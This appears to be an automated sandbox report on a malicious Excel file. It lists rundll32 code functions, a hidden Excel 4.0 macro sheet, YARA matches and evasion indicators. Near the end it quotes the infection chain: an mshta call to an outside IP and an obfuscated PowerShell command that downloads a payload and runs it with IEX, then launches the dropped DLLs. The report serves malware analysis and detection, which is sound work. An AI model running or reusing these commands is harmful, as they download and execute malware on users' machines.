Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036CB5B 11_2_0036CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00367BA6 11_2_00367BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00364B87 11_2_00364B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00359B83 11_2_00359B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00368BE3 11_2_00368BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036DBEA 11_2_0036DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00352BD9 11_2_00352BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00369BCF 11_2_00369BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00357C37 11_2_00357C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00353C3C 11_2_00353C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036AC3A 11_2_0036AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00370C14 11_2_00370C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00354C5D 11_2_00354C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00366C49 11_2_00366C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036DCF7 11_2_0036DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00365CC4 11_2_00365CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00356D24 11_2_00356D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00366DF8 11_2_00366DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00367DD5 11_2_00367DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00359DCF 11_2_00359DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00353E3F 11_2_00353E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00370E3A 11_2_00370E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036BE27 11_2_0036BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00355E60 11_2_00355E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036AE6D 11_2_0036AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00360E53 11_2_00360E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035EE81 11_2_0035EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035AEFB 11_2_0035AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00354EE3 11_2_00354EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00369EEC 11_2_00369EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0036DEDC 11_2_0036DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00370F33 11_2_00370F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035CF47 11_2_0035CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0035DFF3 11_2_0035DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00357FF2 11_2_00357FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B3C3C 13_2_003B3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B9011 13_2_003B9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C044F 13_2_003C044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C20BA 13_2_003C20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BF8FD 13_2_003BF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BD6D8 13_2_003BD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C473C 13_2_003C473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C4116 13_2_003C4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D13AD 13_2_003D13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BAB87 13_2_003BAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C95FA 13_2_003C95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B7FF2 13_2_003B7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B59F2 13_2_003B59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B3E3F 13_2_003B3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CAC3A 13_2_003CAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D0E3A 13_2_003D0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CF435 13_2_003CF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CAA30 13_2_003CAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B7C37 13_2_003B7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CC631 13_2_003CC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CBE27 13_2_003CBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D0C14 13_2_003D0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B4816 13_2_003B4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C8606 13_2_003C8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C0001 13_2_003C0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C907F 13_2_003C907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CAE6D 13_2_003CAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CA666 13_2_003CA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B5E60 13_2_003B5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B4C5D 13_2_003B4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B2051 13_2_003B2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B2251 13_2_003B2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D0056 13_2_003D0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B1A56 13_2_003B1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C0E53 13_2_003C0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C6C49 13_2_003C6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B70B3 13_2_003B70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BF09B 13_2_003BF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BEA99 13_2_003BEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C1889 13_2_003C1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BEE81 13_2_003BEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BAEFB 13_2_003BAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CDCF7 13_2_003CDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C9EEC 13_2_003C9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CA2E8 13_2_003CA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B4EE3 13_2_003B4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B64E2 13_2_003B64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CDEDC 13_2_003CDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C66CA 13_2_003C66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BE2CC 13_2_003BE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C5CC4 13_2_003C5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BB2C7 13_2_003BB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B8B3D 13_2_003B8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B7735 13_2_003B7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D0F33 13_2_003D0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B6D24 13_2_003B6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CBB23 13_2_003CBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C8519 13_2_003C8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C0B19 13_2_003C0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B9714 13_2_003B9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BBB7E 13_2_003BBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B8969 13_2_003B8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C176B 13_2_003C176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B5361 13_2_003B5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BA55F 13_2_003BA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CCB5B 13_2_003CCB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C2550 13_2_003C2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B5548 13_2_003B5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BB74D 13_2_003BB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C894B 13_2_003C894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BCF47 13_2_003BCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B4346 13_2_003B4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B51BB 13_2_003B51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003D09B5 13_2_003D09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B81B7 13_2_003B81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C7BA6 13_2_003C7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CC3A0 13_2_003CC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CE395 13_2_003CE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BE991 13_2_003BE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CD389 13_2_003CD389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B9B83 13_2_003B9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C4B87 13_2_003C4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C6DF8 13_2_003C6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BDFF3 13_2_003BDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003CDBEA 13_2_003CDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C8BE3 13_2_003C8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B2BD9 13_2_003B2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C7DD5 13_2_003C7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003C9BCF 13_2_003C9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003B9DCF 13_2_003B9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BE5CF 13_2_003BE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FF8FD 14_2_001FF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FE991 14_2_001FE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FAB87 14_2_001FAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020BE27 14_2_0020BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F4816 14_2_001F4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F9011 14_2_001F9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020AA30 14_2_0020AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020C631 14_2_0020C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020F435 14_2_0020F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020AC3A 14_2_0020AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00210E3A 14_2_00210E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F3E3F 14_2_001F3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00200001 14_2_00200001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F3C3C 14_2_001F3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00208606 14_2_00208606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F7C37 14_2_001F7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00210C14 14_2_00210C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F4C5D 14_2_001F4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020A666 14_2_0020A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F1A56 14_2_001F1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020AE6D 14_2_0020AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F2051 14_2_001F2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F2251 14_2_001F2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020907F 14_2_0020907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00206C49 14_2_00206C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020044F 14_2_0020044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00200E53 14_2_00200E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00210056 14_2_00210056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F5E60 14_2_001F5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FF09B 14_2_001FF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FEA99 14_2_001FEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002020BA 14_2_002020BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FEE81 14_2_001FEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00201889 14_2_00201889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F70B3 14_2_001F70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FD6D8 14_2_001FD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020A2E8 14_2_0020A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00209EEC 14_2_00209EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FE2CC 14_2_001FE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020DCF7 14_2_0020DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FB2C7 14_2_001FB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FAEFB 14_2_001FAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00205CC4 14_2_00205CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002066CA 14_2_002066CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020DEDC 14_2_0020DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F4EE3 14_2_001F4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F64E2 14_2_001F64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020BB23 14_2_0020BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F9714 14_2_001F9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00210F33 14_2_00210F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020473C 14_2_0020473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F8B3D 14_2_001F8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F7735 14_2_001F7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00204116 14_2_00204116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00208519 14_2_00208519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00200B19 14_2_00200B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F6D24 14_2_001F6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FA55F 14_2_001FA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020176B 14_2_0020176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FB74D 14_2_001FB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F5548 14_2_001F5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FCF47 14_2_001FCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F4346 14_2_001F4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FBB7E 14_2_001FBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020894B 14_2_0020894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00202550 14_2_00202550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F8969 14_2_001F8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020CB5B 14_2_0020CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F5361 14_2_001F5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020C3A0 14_2_0020C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00207BA6 14_2_00207BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002113AD 14_2_002113AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002109B5 14_2_002109B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F9B83 14_2_001F9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F51BB 14_2_001F51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00204B87 14_2_00204B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F81B7 14_2_001F81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020D389 14_2_0020D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020E395 14_2_0020E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00208BE3 14_2_00208BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F2BD9 14_2_001F2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0020DBEA 14_2_0020DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F9DCF 14_2_001F9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FE5CF 14_2_001FE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00206DF8 14_2_00206DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002095FA 14_2_002095FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FDFF3 14_2_001FDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F7FF2 14_2_001F7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F59F2 14_2_001F59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00209BCF 14_2_00209BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00207DD5 14_2_00207DD5
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: 4173.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: imedpub_6.xls Macro extractor: Sheet name: REEEEEEEE
Source: imedpub_6.xls Macro extractor: Sheet name: REEEEEEEE
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Contains functionality to delete services
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_003BE249 DeleteService, 13_2_003BE249
Yara signature match
Source: imedpub_6.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Fjmda\ Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Document contains embedded VBA macros
Source: imedpub_6.xls OLE indicator, VBA macros: true
Source: imedpub_6.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@21/12@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: imedpub_6.xls OLE indicator, Workbook stream: true
Source: imedpub_6.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: imedpub_6.xls ReversingLabs: Detection: 18%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................P...............................P.......................`I.........v.....................K........i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................y0)k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....................y0)k..... ..............................}..v....H.......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................0)k....................................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w.....................0)k......i.............................}..v............0...............h.i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#................1)k....................................}..v....0.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#................1)k......i.............................}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'...............Y.)k....E...............................}..v....p.......0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+...............Y.)k....E...............................}..v............0.................i............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............x.......:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
